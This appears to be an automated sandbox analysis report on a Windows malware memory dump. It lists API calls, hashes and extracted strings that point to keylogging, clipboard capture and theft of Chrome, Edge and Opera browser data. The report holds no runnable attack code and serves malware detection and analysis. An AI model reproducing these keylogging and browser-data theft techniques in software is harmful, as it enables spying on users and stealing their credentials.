                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorHandling__start
                            • String ID: pow
                            • API String ID: 3213639722-2276729525
                            • Opcode ID: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                            • Instruction ID: 9a83a7e01686381b8a8ce0b853cf5bc52d75b03c70b61edc7fb1f4b11142e615
                            • Opcode Fuzzy Hash: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                            • Instruction Fuzzy Hash: 21518A60A842018AFB117714CA4137B3B90EB40701F248DABE5D2563EAEB7D8CB5DA4F
                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404046
                              • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
                              • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
                              • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                              • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                            • Sleep.KERNEL32(000000FA,00462E24), ref: 00404118
                            Strings
                            • /sort "Visit Time" /stext ", xrefs: 00404092
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                            • String ID: /sort "Visit Time" /stext "
                            • API String ID: 368326130-1573945896
                            • Opcode ID: a4a6769404a45eb771fb951e36bc417e5ca480f2d31eb92d27795bae4adf2828
                            • Instruction ID: 7f8942f24ccac46b0034012f494d3192eca769648d2eef92b07e1d28e9d76a7f
                            • Opcode Fuzzy Hash: a4a6769404a45eb771fb951e36bc417e5ca480f2d31eb92d27795bae4adf2828
                            • Instruction Fuzzy Hash: B5316431A0021556CB14FBB6DC969EE73B9AF90308F40017FF506B71E2EE38594ACA99
                            APIs
                              • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                            • __Init_thread_footer.LIBCMT ref: 0040A6E3
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Init_thread_footer__onexit
                            • String ID: [End of clipboard]$[Text copied to clipboard]
                            • API String ID: 1881088180-3686566968
                            • Opcode ID: 8b3756b0909f45d78d669578ef8912b34d58c84c6c9fb6c8f8edd64ed624e4fc
                            • Instruction ID: 89f5e7c07999504d217297f9a041c68b3e0b8c5632e5b70e4a6c966e9d45e494
                            • Opcode Fuzzy Hash: 8b3756b0909f45d78d669578ef8912b34d58c84c6c9fb6c8f8edd64ed624e4fc
                            • Instruction Fuzzy Hash: 42218D31A002055ACB04FBA5D892DEDB378AF54308F10453FF506771D2EF38AE4A8A8D
                            APIs
                            • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0044EF72,?,00000050,?,?,?,?,?), ref: 0044EDF2
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ACP$OCP
                            • API String ID: 0-711371036
                            • Opcode ID: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
                            • Instruction ID: ce4b6ecbf16ce97eee8671cf775368e41a8ae942868fb71505acbacd33d5bec2
                            • Opcode Fuzzy Hash: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
                            • Instruction Fuzzy Hash: 4F21F1E2E00102A2FB348B67CC01BAB72A6FF54B51F568426E90AD7300EB3ADD41C35C
                            APIs
                            • GetWindowTextW.USER32(?,?,0000012C), ref: 00415B2E
                            • IsWindowVisible.USER32(?), ref: 00415B37
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$TextVisible
                            • String ID: (%G
                            • API String ID: 1670992164-3377777310
                            • Opcode ID: 6f17d284cfdb4df53722abd5a13ccbba9f2a9602f3f7b51a6171a740e00953ec
                            • Instruction ID: 7bdbcb6602ffb42e5ce2137d58ff1a132c15f169860b2e192372582f8912ca7a
                            • Opcode Fuzzy Hash: 6f17d284cfdb4df53722abd5a13ccbba9f2a9602f3f7b51a6171a740e00953ec
                            • Instruction Fuzzy Hash: E42166315182019BC314FB61D891EEFB7E9AF94304F50493FF49A920E2FF349A49CA5A
                            APIs
                            • GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405010
                              • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                            • GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405067
                            Strings
                            • Connection KeepAlive | Enabled | Timeout: , xrefs: 00404FFF
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: LocalTime
                            • String ID: Connection KeepAlive | Enabled | Timeout:
                            • API String ID: 481472006-507513762
                            • Opcode ID: db71296423f5ae0c940390bca2fe76bdaa24d7f5692d89ec5d6dad89ab0214d4
                            • Instruction ID: 0beb7a88d254a358a963561f9d97893b624dd36ca90e96b80d49a5b3b1f878f3
                            • Opcode Fuzzy Hash: db71296423f5ae0c940390bca2fe76bdaa24d7f5692d89ec5d6dad89ab0214d4
                            • Instruction Fuzzy Hash: 092137719042406BD304B7219D2976F7794A745308F04047EF845132E2DBBD5988CB9F
                            APIs
                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00432D8F
                            • ___raise_securityfailure.LIBCMT ref: 00432E76
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: FeaturePresentProcessor___raise_securityfailure
                            • String ID: (F
                            • API String ID: 3761405300-3109638091
                            • Opcode ID: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
                            • Instruction ID: 494dc9d0fce29d31cb3ef34e393fed80e8221b4646dfbf54f91bf1ae82b1ca01
                            • Opcode Fuzzy Hash: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
                            • Instruction Fuzzy Hash: 8C21F0BD500205DEE700DF16E9856403BE4BB49314F20943AE9088B3A1F3F669918F9F
                            APIs
                            • GetLocalTime.KERNEL32(00000000), ref: 004194F4
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: LocalTime
                            • String ID: | $%02i:%02i:%02i:%03i
                            • API String ID: 481472006-2430845779
                            • Opcode ID: 3ac86647c9e14ca6f93bd036f528b1de7b867f3a903355216a00816ff0bb3ae2
                            • Instruction ID: bce8772fa89f7f7ff9e68bb522557632f538b64cb503c22793e2f51f4d03e72f
                            • Opcode Fuzzy Hash: 3ac86647c9e14ca6f93bd036f528b1de7b867f3a903355216a00816ff0bb3ae2
                            • Instruction Fuzzy Hash: 68117F315042015AC304FBA5D8518EBB3E8AB94308F500A3FF895A21E2FF3CDA49C65A
                            APIs
                            • PathFileExistsW.SHLWAPI(00000000,00000000,?,?,?,?,?,00415594,00000000), ref: 00418CF2
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExistsFilePath
                            • String ID: alarm.wav$x(G
                            • API String ID: 1174141254-2413638199
                            • Opcode ID: 26c40b3e06d19070c32931467931773a754d599fffa5f8131170b201d030b6b4
                            • Instruction ID: fe962266bcbe9b481af3baecc2186877703bd5259ecc619923a55b1e0e4c82aa
                            • Opcode Fuzzy Hash: 26c40b3e06d19070c32931467931773a754d599fffa5f8131170b201d030b6b4
                            • Instruction Fuzzy Hash: 40019270B0430056C604F7A6E9566EE37958BA1358F00857FA849672E2EEBD4D45C6CF
                            APIs
                              • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                              • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                              • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                            • CloseHandle.KERNEL32(?), ref: 00409FFD
                            • UnhookWindowsHookEx.USER32 ref: 0040A010
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                            • String ID: Online Keylogger Stopped
                            • API String ID: 1623830855-1496645233
                            • Opcode ID: 844159523aa59948fae8112936e3b7164414e1ec4be296e67346653cf839bcc0
                            • Instruction ID: de94d33b988dbd75262e40483fa5bc1fa77a380ea8b62c1163629748a83ca489
                            • Opcode Fuzzy Hash: 844159523aa59948fae8112936e3b7164414e1ec4be296e67346653cf839bcc0
                            • Instruction Fuzzy Hash: 2601F530A003045BD7257F24C81BBBE7BB59B82304F40056FE541225D2EAB91866E7DF
                            APIs
                            • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,?,0040B5A1), ref: 0040B49A
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExistsFilePath
                            • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                            • API String ID: 1174141254-2800177040
                            • Opcode ID: e6d86c904460ed95f93b6480c1b29343ffc8ef0317c86cf59c19c4bf9a903d1b
                            • Instruction ID: 5821409638838460856efc798fa08f59aead72c028a5ec3eaf808f19191aee33
                            • Opcode Fuzzy Hash: e6d86c904460ed95f93b6480c1b29343ffc8ef0317c86cf59c19c4bf9a903d1b
                            • Instruction Fuzzy Hash: CBF0547090021996CA04FBA6CC57DFF7B6CDA10715B40057FBA01721D3EEBC9E5586D9
                            APIs
                            • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,?,0040B53E), ref: 0040B437
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExistsFilePath
                            • String ID: UserProfile$\AppData\Local\Google\Chrome\
                            • API String ID: 1174141254-4188645398
                            • Opcode ID: 3eb312a051bd7b3e881279eab24470592b62138a753e29912da0ff6a2ccc73a2
                            • Instruction ID: 3f8b084fd7c06795b4d0fa8893062b22b44e731770192fac0e06baefb29df0f7
                            • Opcode Fuzzy Hash: 3eb312a051bd7b3e881279eab24470592b62138a753e29912da0ff6a2ccc73a2
                            • Instruction Fuzzy Hash: 3DF08970A0021996CA04FBA6DC479FF7B6CDA10715B40007F7A01721D3EEBC9E498ADD
                            APIs
                            • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0040B604), ref: 0040B4FD
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExistsFilePath
                            • String ID: AppData$\Opera Software\Opera Stable\
                            • API String ID: 1174141254-1629609700
                            • Opcode ID: 642841fccc908c774798103d59d1a545af8806a5893841e3456303e80930f048
                            • Instruction ID: 52471f63f703214977655dbdffc05bc1b666495b4e4508f2cd1aa44db4b955b6
                            • Opcode Fuzzy Hash: 642841fccc908c774798103d59d1a545af8806a5893841e3456303e80930f048
                            • Instruction Fuzzy Hash: 2AF05430900219A6C604FBA6CC479EF7B6C9A50709B40047FB901722D3EEB99A4586DD
                            APIs
                            • GetKeyState.USER32(00000011), ref: 0040A597
                              • Part of subcall function 00409468: GetForegroundWindow.USER32 ref: 0040949C
                              • Part of subcall function 00409468: GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                              • Part of subcall function 00409468: GetKeyboardLayout.USER32(00000000), ref: 004094AE
                              • Part of subcall function 00409468: GetKeyState.USER32(00000010), ref: 004094B8
                              • Part of subcall function 00409468: GetKeyboardState.USER32(?), ref: 004094C5
                              • Part of subcall function 00409468: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                              • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                            • String ID: [AltL]$[AltR]
                            • API String ID: 3195419117-2658077756
                            • Opcode ID: 93bc4c82374cea9adc1be0e1e00b15a6865a0a166cb0b06a72cbb1eb968038fe
                            • Instruction ID: 29e442ca109236f59d068076b5b59df2bd5c1a98fb0e5871b2f0b43888bf59e1
                            • Opcode Fuzzy Hash: 93bc4c82374cea9adc1be0e1e00b15a6865a0a166cb0b06a72cbb1eb968038fe
                            • Instruction Fuzzy Hash: E0E0E52170432026C828363E2D2B6AE39109741761B80006FF8436B2C6EC7E8D1043CF
                            APIs
                            • GetKeyState.USER32(00000012), ref: 0040A5F1
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: State
                            • String ID: [CtrlL]$[CtrlR]
                            • API String ID: 1649606143-2446555240
                            • Opcode ID: 32d4ed10a71edebd33ac4b48b63deb44ff05106530e36cbcea7ee1510555eeab
                            • Instruction ID: c9b4056729f6320a31326482d9effdd17bd0eb8d0dea22e3f8a852eb4ad5c27f
                            • Opcode Fuzzy Hash: 32d4ed10a71edebd33ac4b48b63deb44ff05106530e36cbcea7ee1510555eeab
                            • Instruction Fuzzy Hash: 53E02672B043112AC414397E551EA2A286087917A9F46042FECC3672C3D87F8D2203CF
                            APIs
                            • RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000002,00000000,80000001,6h@,004123E9,00000000,00000000,6h@,origmsc,00000000), ref: 00412422
                            • RegDeleteValueW.ADVAPI32(?,?), ref: 00412436
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeleteOpenValue
                            • String ID: 6h@
                            • API String ID: 2654517830-73392143
                            • Opcode ID: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
                            • Instruction ID: b623b948bfdfa0337ccefb4abe002260ff2e01b184ebd3416e4b53d264740477
                            • Opcode Fuzzy Hash: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
                            • Instruction Fuzzy Hash: 9BE0C231244208BBDF108F71DE07FFA372CDB01F01F5042A5BD0592091C666CE149664
                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D35), ref: 0043B4DB
                            • GetLastError.KERNEL32 ref: 0043B4E9
                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043B544
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharMultiWide$ErrorLast
                            • String ID:
                            • API String ID: 1717984340-0
                            • Opcode ID: b03ae9dac27993159e2f076845c08d8301cee77c5f079c52009939e8645c9409
                            • Instruction ID: 0ecaebee41cb6558e50c6262f5020644a21471e748dd5a13caac6b8f2b864e38
                            • Opcode Fuzzy Hash: b03ae9dac27993159e2f076845c08d8301cee77c5f079c52009939e8645c9409
                            • Instruction Fuzzy Hash: AD411630600205BFDB229F65D844B6B7BB4EF09328F14516EFA59AB3A1DB38CD01C799
                            APIs
                            • IsBadReadPtr.KERNEL32(?,00000014), ref: 004105F1
                            • IsBadReadPtr.KERNEL32(?,00000014), ref: 004106BD
                            • SetLastError.KERNEL32(0000007F), ref: 004106DF
                            • SetLastError.KERNEL32(0000007E,00410955), ref: 004106F6
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLastRead
                            • String ID:
                            • API String ID: 4100373531-0
                            • Opcode ID: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
                            • Instruction ID: 0e21605053d2ba8273329305491efaf700724209343246308e891da9604144dc
                            • Opcode Fuzzy Hash: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
                            • Instruction Fuzzy Hash: 73417C71644305DFE7208F18DC84BA7B7E4FF88714F00442EE54687691EBB5E8A5CB19